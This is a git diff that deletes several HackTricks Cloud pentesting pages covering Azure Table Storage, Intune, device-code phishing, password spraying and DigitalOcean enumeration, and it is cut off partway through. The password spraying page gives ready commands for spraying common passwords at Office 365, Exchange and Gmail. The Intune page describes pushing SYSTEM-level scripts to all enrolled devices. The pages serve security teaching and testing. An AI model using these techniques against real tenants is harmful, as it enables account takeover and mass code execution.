https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-services/az-table-storage.md b/pentesting-cloud/azure-security/az-services/az-table-storage.md deleted file mode 100644 index 1b7b3e923..000000000 --- a/pentesting-cloud/azure-security/az-services/az-table-storage.md +++ /dev/null @@ -1,137 +0,0 @@ -# Az - Table Storage - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -**Azure Table Storage** is a NoSQL key-value store designed for storing large volumes of structured, non-relational data. It offers high availability, low latency, and scalability to handle large datasets efficiently. Data is organized into tables, with each entity identified by a partition key and row key, enabling fast lookups. It supports features like encryption at rest, role-based access control, and shared access signatures for secure, managed storage suitable for a wide range of applications. - -There **isn't built-in backup mechanism** for table storage. - -### Keys - -#### **PartitionKey** - -* The **PartitionKey groups entities into logical partitions**. Entities with the same PartitionKey are stored together, which improves query performance and scalability. -* Example: In a table storing employee data, `PartitionKey` might represent a department, e.g., `"HR"` or `"IT"`. - -#### **RowKey** - -* The **RowKey is the unique identifier** for an entity within a partition. When combined with the PartitionKey, it ensures that each entity in the table has a globally unique identifier. -* Example: For the `"HR"` partition, `RowKey` might be an employee ID, e.g., `"12345"`. - -#### **Other Properties (Custom Properties)** - -* Besides the PartitionKey and RowKey, an entity can have additional **custom properties to store data**. These are user-defined and act like columns in a traditional database. -* Properties are stored as **key-value pairs**. -* Example: `Name`, `Age`, `Title` could be custom properties for an employee. - -## Enumeration - -{% tabs %} -{% tab title="az cli" %} -{% code overflow="wrap" %} -```bash -# Get storage accounts -az storage account list - -# List tables -az storage table list --account-name - -# Read table -az storage entity query \ - --account-name \ - --table-name \ - --top 10 - -# Write table -az storage entity insert \ - --account-name \ - --table-name \ - --entity PartitionKey= RowKey= = - -# Write example -az storage entity insert \ - --account-name mystorageaccount \ - --table-name mytable \ - --entity PartitionKey=HR RowKey=12345 Name="John Doe" Age=30 Title="Manager" - -# Update row -az storage entity merge \ - --account-name mystorageaccount \ - --table-name mytable \ - --entity PartitionKey=pk1 RowKey=rk1 Age=31 -``` -{% endcode %} -{% endtab %} -{% tab title="PowerShell" %} -{% code overflow="wrap" %} -```powershell -# Get storage accounts -Get-AzStorageAccount - -# List tables -Get-AzStorageTable -Context (Get-AzStorageAccount -Name -ResourceGroupName ).Context -``` -{% endcode %} -{% endtab %} -{% endtabs %} - -{% hint style="info" %} -By default `az` cli will use an account key to sign a key and perform the action. To use the Entra ID principal privileges use the parameters `--auth-mode login`. -{% endhint %} - -{% hint style="success" %} -Use the param `--account-key` to indicate the account key to use\ -Use the param `--sas-token` with the SAS token to access via a SAS token -{% endhint %} - -## Privilege Escalation - -Same as storage privesc: - -{% content-ref url="../az-privilege-escalation/az-storage-privesc.md" %} -[az-storage-privesc.md](../az-privilege-escalation/az-storage-privesc.md) -{% endcontent-ref %} - -## Post Exploitation - -{% content-ref url="../az-post-exploitation/az-table-storage-post-exploitation.md" %} -[az-table-storage-post-exploitation.md](../az-post-exploitation/az-table-storage-post-exploitation.md) -{% endcontent-ref %} - -## Persistence - -Same as storage persistence: - -{% content-ref url="../az-persistence/az-storage-persistence.md" %} -[az-storage-persistence.md](../az-persistence/az-storage-persistence.md) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-services/intune.md b/pentesting-cloud/azure-security/az-services/intune.md deleted file mode 100644 index 1c5274e15..000000000 --- a/pentesting-cloud/azure-security/az-services/intune.md +++ /dev/null @@ -1,57 +0,0 @@ -# Az - Intune - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -Microsoft Intune is designed to streamline the process of **app and device management**. Its capabilities extend across a diverse range of devices, encompassing mobile devices, desktop computers, and virtual endpoints. The core functionality of Intune revolves around **managing user access and simplifying the administration of applications** and devices within an organization's network. - -## Cloud -> On-Prem - -A user with **Global Administrator** or **Intune Administrator** role can execute **PowerShell** scripts on any **enrolled Windows** device.\ -The **script** runs with **privileges** of **SYSTEM** on the device only once if it doesn't change, and from Intune it's **not possible to see the output** of the script. - -```powershell -Get-AzureADGroup -Filter "DisplayName eq 'Intune Administrators'" -``` - -1. Login into [https://endpoint.microsoft.com/#home](https://endpoint.microsoft.com/#home) or use Pass-The-PRT -2. Go to **Devices** -> **All Devices** to check devices enrolled to Intune -3. Go to **Scripts** and click on **Add** for Windows 10. -4. Add a **Powershell script** - * ![](<../../../.gitbook/assets/image (264).png>) -5. Specify **Add all users** and **Add all devices** in the **Assignments** page. - -The execution of the script can take up to **one hour**. - -## References - -* [https://learn.microsoft.com/en-us/mem/intune/fundamentals/what-is-intune](https://learn.microsoft.com/en-us/mem/intune/fundamentals/what-is-intune) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md b/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md deleted file mode 100644 index b48b2dcea..000000000 --- a/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-device-code-authentication-phishing.md +++ /dev/null @@ -1,33 +0,0 @@ -# Az - Device Code Authentication Phishing - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -**Check:** [**https://o365blog.com/post/phishing/**](https://o365blog.com/post/phishing/) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying.md b/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying.md deleted file mode 100644 index 2ffc070e9..000000000 --- a/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-password-spraying.md +++ /dev/null @@ -1,61 +0,0 @@ -# Az - Password Spraying - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Password Spray - -In **Azure** this can be done against **different API endpoints** like Azure AD Graph, Microsoft Graph, Office 365 Reporting webservice, etc. - -However, note that this technique is **very noisy** and Blue Team can **easily catch it**. Moreover, **forced password complexity** and the use of **MFA** can make this technique kind of useless. - -You can perform a password spray attack with [**MSOLSpray**](https://github.com/dafthack/MSOLSpray) - -```powershell -. .\MSOLSpray\MSOLSpray.ps1 -Invoke-MSOLSpray -UserList .\validemails.txt -Password Welcome2022! -Verbose -``` - -Or with [**o365spray**](https://github.com/0xZDH/o365spray) - -```bash -python3 o365spray.py --spray -U validemails.txt -p 'Welcome2022!' --count 1 --lockout 1 --domain victim.com -``` - -Or with [**MailSniper**](https://github.com/dafthack/MailSniper) - -```powershell -#OWA -Invoke-PasswordSprayOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile owa-sprayed-creds.txt -#EWS -Invoke-PasswordSprayEWS -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile sprayed-ews-creds.txt -#Gmail -Invoke-PasswordSprayGmail -UserList .\userlist.txt -Password Fall2016 -Threads 15 -OutFile gmail-sprayed-creds.txt -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unath.md b/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unath.md deleted file mode 100644 index 2d7ddc48f..000000000 --- a/pentesting-cloud/azure-security/az-unauthenticated-enum-and-initial-entry/az-vms-unath.md +++ /dev/null @@ -1,69 +0,0 @@ -# Az - VMs Unath - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Virtual Machines - -For more info about Azure Virtual Machines check: - -{% content-ref url="../az-services/vms/" %} -[vms](../az-services/vms/) -{% endcontent-ref %} - -### Exposed vulnerable service - -A network service that is vulnerable to some RCE. - -### Public Gallery Images - -A public image might have secrets inside of it: - -{% code overflow="wrap" %} -```bash -# List all community galleries -az sig list-community --output table - -# Search by publisherUri -az sig list-community --output json --query "[?communityMetadata.publisherUri=='https://3nets.io']" -``` -{% endcode %} - -### Public Extensions - -This would be more weird but not impossible. A big company might put an extension with sensitive data inside of it: - -```bash -# It takes some mins to run -az vm extension image list --output table - -# Get extensions by publisher -az vm extension image list --publisher "Site24x7" --output table -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/digital-ocean-pentesting/README.md b/pentesting-cloud/digital-ocean-pentesting/README.md deleted file mode 100644 index 66f82c478..000000000 --- a/pentesting-cloud/digital-ocean-pentesting/README.md +++ /dev/null @@ -1,67 +0,0 @@ -# Digital Ocean Pentesting - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -**Before start pentesting** a Digital Ocean environment there are a few **basics things you need to know** about how DO works to help you understand what you need to do, how to find misconfigurations and how to exploit them. - -Concepts such as hierarchy, access and other basic concepts are explained in: - -{% content-ref url="do-basic-information.md" %} -[do-basic-information.md](do-basic-information.md) -{% endcontent-ref %} - -## Basic Enumeration - -### SSRF - -{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf" %} - -### Projects - -To get a list of the projects and resources running on each of them from the CLI check: - -{% content-ref url="do-services/do-projects.md" %} -[do-projects.md](do-services/do-projects.md) -{% endcontent-ref %} - -### Whoami - -```bash -doctl account get -``` - -## Services Enumeration - -{% content-ref url="do-services/" %} -[do-services](do-services/) -{% endcontent-ref %} - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/digital-ocean-pentesting/do-permissions-for-a-pentest.md b/pentesting-cloud/digital-ocean-pentesting/do-permissions-for-a-pentest.md deleted file mode 100644 index 3333a417c..000000000 --- a/pentesting-cloud/digital-ocean-pentesting/do-permissions-for-a-pentest.md +++ /dev/null @@ -1,33 +0,0 @@ -# DO - Permissions for a Pentest - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -DO doesn't support granular permissions. So the **minimum role** that allows a user to review all the resources is **member**. A pentester with this permission will be able to perform harmful activities, but it's what it's. - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/digital-ocean-pentesting/do-services/README.md b/pentesting-cloud/digital-ocean-pentesting/do-services/README.md deleted file mode 100644 index 5df4185ea..000000000 --- a/pentesting-cloud/digital-ocean-pentesting/do-services/README.md +++ /dev/null @@ -1,45 +0,0 @@ -# DO - Services - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -DO offers a few services, here you can find how to **enumerate them:** - -* [**Apps**](do-apps.md) -* [**Container Registry**](do-container-registry.md) -* [**Databases**](do-databases.md) -* [**Droplets**](do-droplets.md) -* [**Functions**](do-functions.md) -* [**Images**](do-images.md) -* [**Kubernetes (DOKS)**](do-kubernetes-doks.md) -* [**Networking**](do-networking.md) -* [**Projects**](do-projects.md) -* [**Spaces**](do-spaces.md) -* [**Volumes**](do-volumes.md) - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/digital-ocean-pentesting/do-services/do-apps.md b/pentesting-cloud/digital-ocean-pentesting/do-services/do-apps.md deleted file mode 100644 index f10dcde2f..000000000 --- a/pentesting-cloud/digital-ocean-pentesting/do-services/do-apps.md +++ /dev/null @@ -1,61 +0,0 @@ -# DO - Apps - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -[From the docs:](https://docs.digitalocean.com/glossary/app-platform/) App Platform is a Platform-as-a-Service (PaaS) offering that allows developers to **publish code directly to DigitalOcean** servers without worrying about the underlying infrastructure. - -You can run code directly from **github**, **gitlab**, **docker hub**, **DO container registry** (or a sample app). - -When defining an **env var** you can set it as **encrypted**. The only way to **retreive** its value is executing **commands** inside the host runnig the app. - -An **App URL** looks like this [https://dolphin-app-2tofz.ondigitalocean.app](https://dolphin-app-2tofz.ondigitalocean.app) - -### Enumeration - -```bash -doctl apps list # You should get URLs here -doctl apps spec get # Get yaml (including env vars, might be encrypted) -doctl apps logs # Get HTTP logs -doctl apps list-alerts # Get alerts -doctl apps list-regions # Get available regions and the default one -``` - -{% hint style="danger" %} -**Apps doesn't have metadata endpoint** -{% endhint %} - -### RCE & Encrypted env vars - -To execute code directly in the container executing the App you will need **access to the console** and go to **`https://cloud.digitalocean.com/apps//console/`**. - -That will give you a **shell**, and just executing **`env`** you will be able to see **all the env vars** (including the ones defined as **encrypted**). - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/digital-ocean-pentesting/do-services/do-container-registry.md b/pentesting-cloud/digital-ocean-pentesting/do-services/do-container-registry.md deleted file mode 100644 index 72897f1e7..000000000 --- a/pentesting-cloud/digital-ocean-pentesting/do-services/do-container-registry.md +++ /dev/null @@ -1,59 +0,0 @@ -# DO - Container Registry - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} - -## Basic Information - -DigitalOcean Container Registry is a service provided by DigitalOcean that **allows you to store and manage Docker images**. It is a **private** registry, which means that the images that you store in it are only accessible to you and users that you grant access to. This allows you to securely store and manage your Docker images, and use them to deploy containers on DigitalOcean or any other environment that supports Docker. - -When creating a Container Registry it's possible to **create a secret with pull images access (read) over it in all the namespaces** of Kubernetes clusters. - -### Connection - -```bash -# Using doctl -doctl registry login - -# Using docker (You need an API token, use it as username and as password) -docker login registry.digitalocean.com -Username: -Password: -``` - -### Enumeration - -```bash -# Get creds to access the registry from the API -doctl registry docker-config - -# List -doctl registry repository list-v2 -``` - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} diff --git a/pentesting-cloud/digital-ocean-pentesting/do-services/do-databases.md b/pentesting-cloud/digital-ocean-pentesting/do-services/do-databases.md deleted file mode 100644 index d31d67c7b..000000000 --- a/pentesting-cloud/digital-ocean-pentesting/do-services/do-databases.md +++ /dev/null @@ -1,71 +0,0 @@ -# DO - Databases - -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
